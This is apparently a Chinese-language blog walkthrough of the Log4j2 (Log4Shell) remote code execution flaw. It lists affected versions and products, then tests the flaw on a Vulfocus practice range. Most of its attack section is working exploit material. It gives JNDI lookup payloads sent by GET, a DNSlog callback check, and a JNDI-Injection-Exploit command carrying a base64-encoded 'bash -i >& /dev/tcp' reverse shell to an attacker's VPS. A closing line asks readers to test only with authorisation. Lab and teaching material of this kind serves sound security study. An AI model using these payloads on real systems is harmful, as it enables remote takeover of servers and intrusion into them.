漏洞描述
Apache Log4j2是Apache软件基金会下的Java开源日志记录工具。Log4j2是对Log4j 1.x的重写,并引入了丰富的功能。广泛应用于业务系统开发,用于记录日志信息。该日志框架因其优异性能而在各种Web服务中得到广泛应用。
漏洞评级
Apache Log4j 远程代码执行漏洞:严重
影响范围
- Apache log4j2 2.* 到 Apache log4j2 2.15.1.rc1
- 主流相关产品:
- Spring-Boot-strater-log4j2
- Apache Struts2
- Apache Solr
- Apache Flink
- Apache Druid
- ElasticSearch
Vuofocus 靶场测试
Vuofocus是一个供安全爱好者学习漏洞测试的平台。
Dnslog 出网测试
Dnslog是一个用于测试和验证域名解析情况的工具。
Payload 示例
使用GET方式提交payload:
- payload=${jndi:ldap://X.X.X.X/exp}
- payload=${jndi:ldap://5e0s0v.dnslog.cn/exp}
JNDI注入反弹shell
使用JNDI注入反弹shell,示例payload:
<code>bash -i >& /dev/tcp/ip/port 0>&1 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcCUuMjQuOTUuMi83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}" -A [vps ip]</code>
反弹shell命令进行了base64编码,可以参考此处获取更多payload。
成功利用漏洞
通过成功的JNDI注入反弹shell,攻击者可以获取目标系统的控制权。
注:请在合法授权和道德框架下使用漏洞测试工具,以遵守法律和道德准则。
© 版权声明
THE END
暂无评论内容